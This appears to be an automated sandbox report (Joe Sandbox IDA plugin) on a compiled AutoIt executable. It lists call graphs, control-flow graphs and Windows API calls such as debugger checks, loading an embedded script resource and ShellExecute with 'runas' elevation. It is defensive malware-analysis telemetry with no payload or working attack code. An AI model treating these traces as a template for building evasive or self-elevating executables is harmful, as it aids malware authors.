API calls 2 library calls 102992->103081 102995 3b9b32 102995->102992 102997 3b9b38 102995->102997 102996 3b9b58 102996->102948 103080 3b9a33 58 API calls 4 library calls 102997->103080 102999 3b9b40 GetCurrentThreadId 102999->102948 103001 3bd5de _fseek 103000->103001 103002 3b9c0b __lock 58 API calls 103001->103002 103003 3bd5e5 103002->103003 103004 3b87d5 __calloc_crt 58 API calls 103003->103004 103007 3bd5f6 103004->103007 103005 3bd601 _fseek @_EH4_CallFilterFunc@8 103005->102952 103006 3bd661 GetStartupInfoW 103012 3bd676 103006->103012 103014 3bd7a5 103006->103014 103007->103005 103007->103006 103008 3bd86d 103095 3bd87d LeaveCriticalSection _doexit 103008->103095 103010 3b87d5 __calloc_crt 58 API calls 103010->103012 103011 3bd7f2 GetStdHandle 103011->103014 103012->103010 103012->103014 103016 3bd6c4 103012->103016 103013 3bd805 GetFileType 103013->103014 103014->103008 103014->103011 103014->103013 103094 3b9e2b InitializeCriticalSectionAndSpinCount 103014->103094 103015 3bd6f8 GetFileType 103015->103016 103016->103014 103016->103015 103093 3b9e2b InitializeCriticalSectionAndSpinCount 103016->103093 103020 3b7d06 103019->103020 103021 3c4f34 103019->103021 103025 3c4b1b GetModuleFileNameW 103020->103025 103096 3b881d 58 API calls 2 library calls 103021->103096 103023 3c4f5a _memmove 103024 3c4f70 FreeEnvironmentStringsW 103023->103024 103024->103020 103026 3c4b4f _wparse_cmdline 103025->103026 103028 3c4b8f _wparse_cmdline 103026->103028 103097 3b881d 58 API calls 2 library calls 103026->103097 103028->102959 103030 3c4d69 103029->103030 103031 3c4d71 __NMSG_WRITE 103029->103031 103030->102963 103032 3b87d5 __calloc_crt 58 API calls 103031->103032 103033 3c4d9a __NMSG_WRITE 103032->103033 103033->103030 103035 3c4df1 103033->103035 103036 3b87d5 __calloc_crt 58 API calls 103033->103036 103037 3c4e16 103033->103037 103040 3c4e2d 103033->103040 103098 3c4607 58 API calls __gmtime64_s 103033->103098 103034 3b2d55 _free 58 API calls 103034->103030 103035->103034 103036->103033 103038 3b2d55 _free 58 API calls 103037->103038 103038->103030 103099 3b8dc6 IsProcessorFeaturePresent 103040->103099 103042 3c4e39 103042->102963 103045 3b30fb __IsNonwritableInCurrentImage 103043->103045 103114 3ba4d1 103045->103114 103046 3b3119 __initterm_e 103047 3b2d40 __cinit 67 API calls 103046->103047 103048 3b3138 __cinit __IsNonwritableInCurrentImage 103046->103048 103047->103048 103048->102967 103050 3947ea 103049->103050 103060 394889 103049->103060 103051 394824 IsThemeActive 103050->103051 103117 3b336c 103051->103117 103055 394850 103129 3948fd SystemParametersInfoW SystemParametersInfoW 103055->103129 103057 39485c 103130 393b3a 103057->103130 103059 394864 SystemParametersInfoW 103059->103060 103060->102971 103061->102945 103062->102949 103063->102956 103067->102972 103068->102975 103069->102981 103070->102983 103071->102987 103072->102988 103074 3b87dc 103073->103074 103076 3b8817 103074->103076 103078 3b87fa 103074->103078 103082 3c51f6 103074->103082 103076->102992 103079 3b9de6 TlsSetValue 103076->103079 103078->103074 103078->103076 103090 3ba132 Sleep 103078->103090 103079->102995 103080->102999 103081->102996 103083 3c5201 103082->103083 103087 3c521c 103082->103087 103084 3c520d 103083->103084 103083->103087 103091 3b8b28 58 API calls __getptd_noexit 103084->103091 103086 3c522c HeapAlloc 103086->103087 103088 3c5212 103086->103088 103087->103086 103087->103088 103092 3b33a1 DecodePointer 103087->103092 103088->103074 103090->103078 103091->103088 103092->103087 103093->103016 103094->103014 103095->103005 103096->103023 103097->103028 103098->103033 103100 3b8dd1 103099->103100 103105 3b8c59 103100->103105 103104 3b8dec 103104->103042 103106 3b8c73 _memset __call_reportfault 103105->103106 103107 3b8c93 IsDebuggerPresent 103106->103107 103113 3ba155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103107->103113 103109 3bc5f6 __cftog_l 6 API calls 103111 3b8d7a 103109->103111 103110 3b8d57 __call_reportfault 103110->103109 103112 3ba140 GetCurrentProcess TerminateProcess 103111->103112 103112->103104 103113->103110 103115 3ba4d4 EncodePointer 103114->103115 103115->103115 103116 3ba4ee 103115->103116 103116->103046 103118 3b9c0b __lock 58 API calls 103117->103118 103119 3b3377 DecodePointer EncodePointer 103118->103119 103182 3b9d75 LeaveCriticalSection 103119->103182 103121 394849 103122 3b33d4 103121->103122 103123 3b33f8 103122->103123 103124 3b33de 103122->103124 103123->103055 103124->103123 103183 3b8b28 58 API calls __getptd_noexit 103124->103183 103126 3b33e8 103184 3b8db6 9 API calls __gmtime64_s 103126->103184 103128 3b33f3 103128->103055 103129->103057 103131 393b47 __write_nolock 103130->103131 103132 397667 59 API calls 103131->103132 103133 393b51 GetCurrentDirectoryW 103132->103133 103185 393766 103133->103185 103135 393b7a IsDebuggerPresent 103136 393b88 103135->103136 103137 3cd272 MessageBoxA 103135->103137 103139 3cd28c 103136->103139 103140 393ba5 103136->103140 103168 393c61 103136->103168 103137->103139 103138 393c68 SetCurrentDirectoryW 103141 393c75 Mailbox 103138->103141 103307 397213 59 API calls Mailbox 103139->103307 103266 397285 103140->103266 103141->103059 103145 3cd29c 103149 3cd2b2 SetCurrentDirectoryW 103145->103149 103149->103141 103168->103138 103182->103121 103183->103126 103184->103128 103186 397667 59 API calls 103185->103186 103187 39377c 103186->103187 103309 393d31 103187->103309 103189 39379a 103190 394706 61 API calls 103189->103190 103191 3937ae 103190->103191 103192 397de1 59 API calls 103191->103192 103193 3937bb 103192->103193 103194 394ddd 136 API calls 103193->103194 103195 3937d4 103194->103195 103196 3937dc Mailbox 103195->103196 103197 3cd173 103195->103197 103201 398047 59 API calls 103196->103201 103351 3f955b 103197->103351 103200 3cd192 103203 3b2d55 _free 58 API calls 103200->103203 103204 3937ef 103201->103204 103202 394e4a 84 API calls 103202->103200 103205 3cd19f 103203->103205 103323 39928a 103204->103323 103207 394e4a 84 API calls 103205->103207 103209 3cd1a8 103207->103209 103213 393ed0 59 API calls 103209->103213 103210 397de1 59 API calls 103211 393808 103210->103211 103212 3984c0 69 API calls 103211->103212 103214 39381a Mailbox 103212->103214 103215 3cd1c3 103213->103215 103216 397de1 59 API calls 103214->103216 103217 393ed0 59 API calls 103215->103217 103218 393840 103216->103218 103219 3cd1df 103217->103219 103220 3984c0 69 API calls 103218->103220 103221 394706 61 API calls 103219->103221 103223 39384f Mailbox 103220->103223 103222 3cd204 103221->103222 103224 393ed0 59 API calls 103222->103224 103226 397667 59 API calls 103223->103226 103225 3cd210 103224->103225 103227 398047 59 API calls 103225->103227 103228 39386d 103226->103228 103229 3cd21e 103227->103229 103326 393ed0 103228->103326 103231 393ed0 59 API calls 103229->103231 103234 3cd22d 103231->103234 103239 398047 59 API calls 103234->103239 103235 393887 103235->103209 103236 393891 103235->103236 103237 3b2efd _W_store_winword 60 API calls 103236->103237 103238 39389c 103237->103238 103238->103215 103240 3938a6 103238->103240 103241 3cd24f 103239->103241 103242 3b2efd _W_store_winword 60 API calls 103240->103242 103243 393ed0 59 API calls 103241->103243 103244 3938b1 103242->103244 103245 3cd25c 103243->103245 103244->103219 103246 3938bb 103244->103246 103245->103245 103247 3b2efd _W_store_winword 60 API calls 103246->103247 103248 3938c6 103247->103248 103248->103234 103249 393907 103248->103249 103251 393ed0 59 API calls 103248->103251 103249->103234 103250 393914 103249->103250 103252 3992ce 59 API calls 103250->103252 103253 3938ea 103251->103253 103254 393924 103252->103254 103255 398047 59 API calls 103253->103255 103257 399050 59 API calls 103254->103257 103256 3938f8 103255->103256 103258 393ed0 59 API calls 103256->103258 103259 393932 103257->103259 103258->103249 103342 398ee0 103259->103342 103261 39394f 103262 39928a 59 API calls 103261->103262 103263 398ee0 60 API calls 103261->103263 103264 393ed0 59 API calls 103261->103264 103265 393995 Mailbox 103261->103265 103262->103261 103263->103261 103264->103261 103265->103135 103267 397292 __write_nolock 103266->103267 103268 3972ab 103267->103268 103269 3cea22 _memset 103267->103269 103270 394750 60 API calls 103268->103270 103271 3cea3e GetOpenFileNameW 103269->103271 103272 3972b4 103270->103272 103273 3cea8d 103271->103273 103391 3b0791 103272->103391 103275 397bcc 59 API calls 103273->103275 103277 3ceaa2 103275->103277 103277->103277 103279 3972c9 103409 39686a 103279->103409 103307->103145 103310 393d3e __write_nolock 103309->103310 103311 393ea4 Mailbox 103310->103311 103312 397bcc 59 API calls 103310->103312 103311->103189 103313 393d70 103312->103313 103314 3979f2 59 API calls 103313->103314 103322 393da6 Mailbox 103313->103322 103314->103313 103315 393e77 103315->103311 103316 397de1 59 API calls 103315->103316 103318 393e98 103316->103318 103317 397de1 59 API calls 103317->103322 103319 393f74 59 API calls 103318->103319 103319->103311 103320 3979f2 59 API calls 103320->103322 103321 393f74 59 API calls 103321->103322 103322->103311 103322->103315 103322->103317 103322->103320 103322->103321 103324 3b0db6 Mailbox 59 API calls 103323->103324 103325 3937fb 103324->103325 103325->103210 103327 393eda 103326->103327 103328 393ef3 103326->103328 103329 398047 59 API calls 103327->103329 103330 397bcc 59 API calls 103328->103330 103331 393879 103329->103331 103330->103331 103332 3b2efd 103331->103332 103333 3b2f09 103332->103333 103334 3b2f7e 103332->103334 103341 3b2f2e 103333->103341 103386 3b8b28 58 API calls __getptd_noexit 103333->103386 103388 3b2f90 60 API calls 3 library calls 103334->103388 103337 3b2f8b 103337->103235 103338 3b2f15 103387 3b8db6 9 API calls __gmtime64_s 103338->103387 103340 3b2f20 103340->103235 103341->103235 103343 3cf17c 103342->103343 103350 398ef7 103342->103350 103343->103350 103389 398bdb 59 API calls Mailbox 103343->103389 103345 398fff 103345->103261 103346 398ff8 103348 3b0db6 Mailbox 59 API calls 103346->103348 103347 399040 103349 399d3c 60 API calls 103347->103349 103348->103345 103349->103345 103350->103345 103350->103346 103350->103347 103352 394ee5 85 API calls 103351->103352 103353 3f95ca 103352->103353 103354 3f9734 96 API calls 103353->103354 103355 3f95dc 103354->103355 103356 3cd186 103355->103356 103357 394f0b 74 API calls 103355->103357 103356->103200 103356->103202 103358 3f95f7 103357->103358 103359 394f0b 74 API calls 103358->103359 103360 3f9607 103359->103360 103361 394f0b 74 API calls 103360->103361 103362 3f9622 103361->103362 103363 394f0b 74 API calls 103362->103363 103364 3f963d 103363->103364 103365 394ee5 85 API calls 103364->103365 103366 3f9654 103365->103366 103367 3b571c __malloc_crt 58 API calls 103366->103367 103368 3f965b 103367->103368 103369 3b571c __malloc_crt 58 API calls 103368->103369 103370 3f9665 103369->103370 103371 394f0b 74 API calls 103370->103371 103372 3f9679 103371->103372 103373 3f9109 GetSystemTimeAsFileTime 103372->103373 103374 3f968c 103373->103374 103375 3f96b6 103374->103375 103376 3f96a1 103374->103376 103377 3f96bc 103375->103377 103378 3f971b 103375->103378 103379 3b2d55 _free 58 API calls 103376->103379 103390 3f8b06 116 API calls __fcloseall 103377->103390 103382 3b2d55 _free 58 API calls 103378->103382 103380 3f96a7 103379->103380 103383 3b2d55 _free 58 API calls 103380->103383 103382->103356 103383->103356 103384 3f9713 103385 3b2d55 _free 58 API calls 103384->103385 103385->103356 103386->103338 103387->103340 103388->103337 103389->103350 103390->103384 103392 3c1940 __write_nolock 103391->103392 103393 3b079e GetLongPathNameW 103392->103393 103394 397bcc 59 API calls 103393->103394 103395 3972bd 103394->103395 103396 39700b 103395->103396 103397 397667 59 API calls 103396->103397 103398 39701d 103397->103398 103399 394750 60 API calls 103398->103399 103400 397028 103399->103400 103401 397033 103400->103401 103405 3ce885 103400->103405 103402 393f74 59 API calls 103401->103402 103404 39703f 103402->103404 103443 3934c2 103404->103443 103407 3ce89f 103405->103407 103449 397908 61 API calls 103405->103449 103408 397052 Mailbox 103408->103279 103410 394ddd 136 API calls 103409->103410 103411 39688f 103410->103411 103412 3ce031 103411->103412 103413 394ddd 136 API calls 103411->103413 103414 3f955b 122 API calls 103412->103414 103415 3968a3 103413->103415 103416 3ce046 103414->103416 103415->103412 103417 3968ab 103415->103417 103418 3ce04a 103416->103418 103419 3ce067 103416->103419 103421 3ce052 103417->103421 103422 3968b7 103417->103422 103423 394e4a 84 API calls 103418->103423 103420 3b0db6 Mailbox 59 API calls 103419->103420 103432 3ce0ac Mailbox 103420->103432 103549 3f42f8 91 API calls _wprintf 103421->103549 103450 396a8c 103422->103450 103423->103421 103426 3ce060 103426->103419 103428 3ce260 103432->103428 103433 39750f 59 API calls 103432->103433 103436 3ce271 103432->103436 103440 397de1 59 API calls 103432->103440 103433->103432 103440->103432 103444 3934d4 103443->103444 103448 3934f3 _memmove 103443->103448 103446 3b0db6 Mailbox 59 API calls 103444->103446 103445 3b0db6 Mailbox 59 API calls 103447 39350a 103445->103447 103446->103448 103447->103408 103448->103445 103449->103405 103451 3ce41e 103450->103451 103452 396ab5 103450->103452 103549->103426 103603 391016 103608 394974 103603->103608 103606 3b2d40 __cinit 67 API calls 103607 391025 103606->103607 103609 3b0db6 Mailbox 59 API calls 103608->103609 103610 39497c 103609->103610 103611 39101b 103610->103611 103615 394936 103610->103615 103611->103606 103616 39493f 103615->103616 103617 394951 103615->103617 103618 3b2d40 __cinit 67 API calls 103616->103618 103619 3949a0 103617->103619 103618->103617 103620 397667 59 API calls 103619->103620 103621 3949b8 GetVersionExW 103620->103621 103622 397bcc 59 API calls 103621->103622 103623 3949fb 103622->103623 103624 397d2c 59 API calls 103623->103624 103629 394a28 103623->103629 103625 394a1c 103624->103625 103626 397726 59 API calls 103625->103626 103626->103629 103627 394a93 GetCurrentProcess IsWow64Process 103628 394aac 103627->103628 103631 394b2b GetSystemInfo 103628->103631 103632 394ac2 103628->103632 103629->103627 103630 3cd864 103629->103630 103633 394af8 103631->103633 103643 394b37 103632->103643 103633->103611 103636 394b1f GetSystemInfo 103638 394ae9 103636->103638 103637 394ad4 103639 394b37 2 API calls 103637->103639 103638->103633 103641 394aef FreeLibrary 103638->103641 103640 394adc GetNativeSystemInfo 103639->103640 103640->103638 103641->103633 103644 394ad0 103643->103644 103645 394b40 LoadLibraryA 103643->103645 103644->103636 103644->103637 103645->103644 103646 394b51 GetProcAddress 103645->103646 103646->103644 103647 391066 103652 39f76f 103647->103652 103649 39106c 103650 3b2d40 __cinit 67 API calls 103649->103650 103651 391076 103650->103651 103653 39f790 103652->103653 103685 3aff03 103653->103685 103657 39f7d7 103658 397667 59 API calls 103657->103658 103659 39f7e1 103658->103659 103660 397667 59 API calls 103659->103660 103661 39f7eb 103660->103661 103662 397667 59 API calls 103661->103662 103663 39f7f5 103662->103663 103664 397667 59 API calls 103663->103664 103665 39f833 103664->103665 103666 397667 59 API calls 103665->103666 103667 39f8fe 103666->103667 103695 3a5f87 103667->103695 103671 39f930 103672 397667 59 API calls 103671->103672 103673 39f93a 103672->103673 103723 3afd9e 103673->103723 103675 39f981 103676 39f991 GetStdHandle 103675->103676 103677 39f9dd 103676->103677 103678 3d45ab 103676->103678 103679 39f9e5 OleInitialize 103677->103679 103678->103677 103680 3d45b4 103678->103680 103679->103649 103730 3f6b38 64 API calls Mailbox 103680->103730 103682 3d45bb 103731 3f7207 CreateThread 103682->103731 103684 3d45c7 CloseHandle 103684->103679 103732 3affdc 103685->103732 103688 3affdc 59 API calls 103689 3aff45 103688->103689 103690 397667 59 API calls 103689->103690 103691 3aff51 103690->103691 103692 397bcc 59 API calls 103691->103692 103693 39f796 103692->103693 103694 3b0162 6 API calls 103693->103694 103694->103657 103696 397667 59 API calls 103695->103696 103697 3a5f97 103696->103697 103698 397667 59 API calls 103697->103698 103699 3a5f9f 103698->103699 103739 3a5a9d 103699->103739 103702 3a5a9d 59 API calls 103703 3a5faf 103702->103703 103704 397667 59 API calls 103703->103704 103705 3a5fba 103704->103705 103706 3b0db6 Mailbox 59 API calls 103705->103706 103707 39f908 103706->103707 103708 3a60f9 103707->103708 103709 3a6107 103708->103709 103710 397667 59 API calls 103709->103710 103711 3a6112 103710->103711 103712 397667 59 API calls 103711->103712 103713 3a611d 103712->103713 103714 397667 59 API calls 103713->103714 103715 3a6128 103714->103715 103716 397667 59 API calls 103715->103716 103717 3a6133 103716->103717 103718 3a5a9d 59 API calls 103717->103718 103719 3a613e 103718->103719 103720 3b0db6 Mailbox 59 API calls 103719->103720 103721 3a6145 RegisterWindowMessageW 103720->103721 103721->103671 103724 3e576f 103723->103724 103725 3afdae 103723->103725 103742 3f9ae7 60 API calls 103724->103742 103727 3b0db6 Mailbox 59 API calls 103725->103727 103729 3afdb6 103727->103729 103728 3e577a 103729->103675 103730->103682 103731->103684 103743 3f71ed 65 API calls 103731->103743 103733 397667 59 API calls 103732->103733 103734 3affe7 103733->103734 103735 397667 59 API calls 103734->103735 103736 3affef 103735->103736 103737 397667 59 API calls 103736->103737 103738 3aff3b 103737->103738 103738->103688 103740 397667 59 API calls 103739->103740 103741 3a5aa5 103740->103741 103741->103702 103742->103728

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00393B68
                                                          • IsDebuggerPresent.KERNEL32 ref: 00393B7A
                                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?,004552F8,004552E0,?,?), ref: 00393BEB
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                            • Part of subcall function 003A092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00393C14,004552F8,?,?,?), ref: 003A096E
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00393C6F
                                                          • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00447770,00000010), ref: 003CD281
                                                          • SetCurrentDirectoryW.KERNEL32(?,004552F8,?,?,?), ref: 003CD2B9
                                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00444260,004552F8,?,?,?), ref: 003CD33F
                                                          • ShellExecuteW.SHELL32(00000000,?,?), ref: 003CD346
                                                            • Part of subcall function 00393A46: GetSysColorBrush.USER32(0000000F), ref: 00393A50
                                                            • Part of subcall function 00393A46: LoadCursorW.USER32(00000000,00007F00), ref: 00393A5F
                                                            • Part of subcall function 00393A46: LoadIconW.USER32(00000063), ref: 00393A76
                                                            • Part of subcall function 00393A46: LoadIconW.USER32(000000A4), ref: 00393A88
                                                            • Part of subcall function 00393A46: LoadIconW.USER32(000000A2), ref: 00393A9A
                                                            • Part of subcall function 00393A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00393AC0
                                                            • Part of subcall function 00393A46: RegisterClassExW.USER32(?), ref: 00393B16
                                                            • Part of subcall function 003939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00393A03
                                                            • Part of subcall function 003939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00393A24
                                                            • Part of subcall function 003939D5: ShowWindow.USER32(00000000,?,?), ref: 00393A38
                                                            • Part of subcall function 003939D5: ShowWindow.USER32(00000000,?,?), ref: 00393A41
                                                            • Part of subcall function 0039434A: _memset.LIBCMT ref: 00394370
                                                            • Part of subcall function 0039434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00394415
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: This is a third-party compiled AutoIt script.$runas$%B
                                                          • API String ID: 529118366-814997577
                                                          • Opcode ID: aff78624423f6ae401cf7b4395441562becc1d29d9099a88fbee35eb95115cab
                                                          • Instruction ID: 64babfe9cf5ea2b5a2084863c2833cccb2793763b369e95786cc15dab799c523
                                                          • Opcode Fuzzy Hash: aff78624423f6ae401cf7b4395441562becc1d29d9099a88fbee35eb95115cab
                                                          • Instruction Fuzzy Hash: 8551E671908608AADF13EBB4DC15EFD7B78AF45701F0040B9F851AA1A2DB749A46CF25

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1037 3949a0-394a00 call 397667 GetVersionExW call 397bcc 1042 394b0b-394b0d 1037->1042 1043 394a06 1037->1043 1044 3cd767-3cd773 1042->1044 1045 394a09-394a0e 1043->1045 1046 3cd774-3cd778 1044->1046 1047 394b12-394b13 1045->1047 1048 394a14 1045->1048 1050 3cd77a 1046->1050 1051 3cd77b-3cd787 1046->1051 1049 394a15-394a4c call 397d2c call 397726 1047->1049 1048->1049 1059 3cd864-3cd867 1049->1059 1060 394a52-394a53 1049->1060 1050->1051 1051->1046 1053 3cd789-3cd78e 1051->1053 1053->1045 1055 3cd794-3cd79b 1053->1055 1055->1044 1057 3cd79d 1055->1057 1061 3cd7a2-3cd7a5 1057->1061 1062 3cd869 1059->1062 1063 3cd880-3cd884 1059->1063 1060->1061 1064 394a59-394a64 1060->1064 1065 3cd7ab-3cd7c9 1061->1065 1066 394a93-394aaa GetCurrentProcess IsWow64Process 1061->1066 1067 3cd86c 1062->1067 1071 3cd86f-3cd878 1063->1071 1072 3cd886-3cd88f 1063->1072 1068 394a6a-394a6c 1064->1068 1069 3cd7ea-3cd7f0 1064->1069 1065->1066 1070 3cd7cf-3cd7d5 1065->1070 1073 394aac 1066->1073 1074 394aaf-394ac0 1066->1074 1067->1071 1075 3cd805-3cd811 1068->1075 1076 394a72-394a75 1068->1076 1079 3cd7fa-3cd800 1069->1079 1080 3cd7f2-3cd7f5 1069->1080 1077 3cd7df-3cd7e5 1070->1077 1078 3cd7d7-3cd7da 1070->1078 1071->1063 1072->1067 1081 3cd891-3cd894 1072->1081 1073->1074 1082 394b2b-394b35 GetSystemInfo 1074->1082 1083 394ac2-394ad2 call 394b37 1074->1083 1087 3cd81b-3cd821 1075->1087 1088 3cd813-3cd816 1075->1088 1084 394a7b-394a8a 1076->1084 1085 3cd831-3cd834 1076->1085 1077->1066 1078->1066 1079->1066 1080->1066 1081->1071 1086 394af8-394b08 1082->1086 1094 394b1f-394b29 GetSystemInfo 1083->1094 1095 394ad4-394ae1 call 394b37 1083->1095 1090 394a90 1084->1090 1091 3cd826-3cd82c 1084->1091 1085->1066 1093 3cd83a-3cd84f 1085->1093 1087->1066 1088->1066 1090->1066 1091->1066 1096 3cd859-3cd85f 1093->1096 1097 3cd851-3cd854 1093->1097 1098 394ae9-394aed 1094->1098 1102 394b18-394b1d 1095->1102 1103 394ae3-394ae7 GetNativeSystemInfo 1095->1103 1096->1066 1097->1066 1098->1086 1101 394aef-394af2 FreeLibrary 1098->1101 1101->1086 1102->1103 1103->1098
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 003949CD
                                                            • Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06
                                                          • GetCurrentProcess.KERNEL32(?,0041FAEC,00000000,00000000,?), ref: 00394A9A
                                                          • IsWow64Process.KERNEL32(00000000), ref: 00394AA1
                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00394AE7
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00394AF2
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00394B23
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00394B2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: 7037693efff0dfe0c039c16f1ddddfffcfeeb0ca782642ea80a791a3bb064c02
                                                          • Instruction ID: b376e1e1fa1ef05849f092bdfc0f7b817d91abe6bbad9bcf1c797103ee89c16f
                                                          • Opcode Fuzzy Hash: 7037693efff0dfe0c039c16f1ddddfffcfeeb0ca782642ea80a791a3bb064c02
                                                          • Instruction Fuzzy Hash: 5091C7319897C0DECB32DB788550AAAFFF5AF2A300B4449ADE0C797A41D234E909C75D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1104 394e89-394ea1 CreateStreamOnHGlobal 1105 394ec1-394ec6 1104->1105 1106 394ea3-394eba FindResourceExW 1104->1106 1107 394ec0 1106->1107 1108 3cd933-3cd942 LoadResource 1106->1108 1107->1105 1108->1107 1109 3cd948-3cd956 SizeofResource 1108->1109 1109->1107 1110 3cd95c-3cd967 LockResource 1109->1110 1110->1107 1111 3cd96d-3cd975 1110->1111 1112 3cd979-3cd98b 1111->1112 1112->1107
                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00394D8E,?,?,00000000,00000000), ref: 00394E99
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00394D8E,?,?,00000000,00000000), ref: 00394EB0
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00394D8E,?,?,00000000,00000000,?,?,?,?,?,?,00394E2F), ref: 003CD937
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00394D8E,?,?,00000000,00000000,?,?,?,?,?,?,00394E2F), ref: 003CD94C
                                                          • LockResource.KERNEL32(00394D8E,?,?,00394D8E,?,?,00000000,00000000,?,?,?,?,?,?,00394E2F,00000000), ref: 003CD95F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: 435da7c36ca698b6cac43a1856464b286d8a149349d05d3af8a64e60a613b935
                                                          • Instruction ID: ca2b9deab4c08a28a5999f815664dceac0c04fb57ce9954e1882d2afcc9ba410
                                                          • Opcode Fuzzy Hash: 435da7c36ca698b6cac43a1856464b286d8a149349d05d3af8a64e60a613b935
                                                          • Instruction Fuzzy Hash: 37114C75640700ABDB218B65EC48F677BBAEBC5B51F208278F40586250DB71EC068665
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: pbE$%B
                                                          • API String ID: 3964851224-1549336217
                                                          • Opcode ID: 640933424c28822ae1ea91a6b9fbc840d62bdd670308befa7063bf34fe827326
                                                          • Instruction ID: 7aa1a0952a98fb1641712f688b978c6f3c363335e8c78cf491b6ce720bf7b0ae
                                                          • Opcode Fuzzy Hash: 640933424c28822ae1ea91a6b9fbc840d62bdd670308befa7063bf34fe827326
                                                          • Instruction Fuzzy Hash: BA928D75A083418FD726DF14C480B2AB7E4FF86304F15896EE88A9B361D775EC45CB92
                                                          Strings
                                                          Memory Dump Source
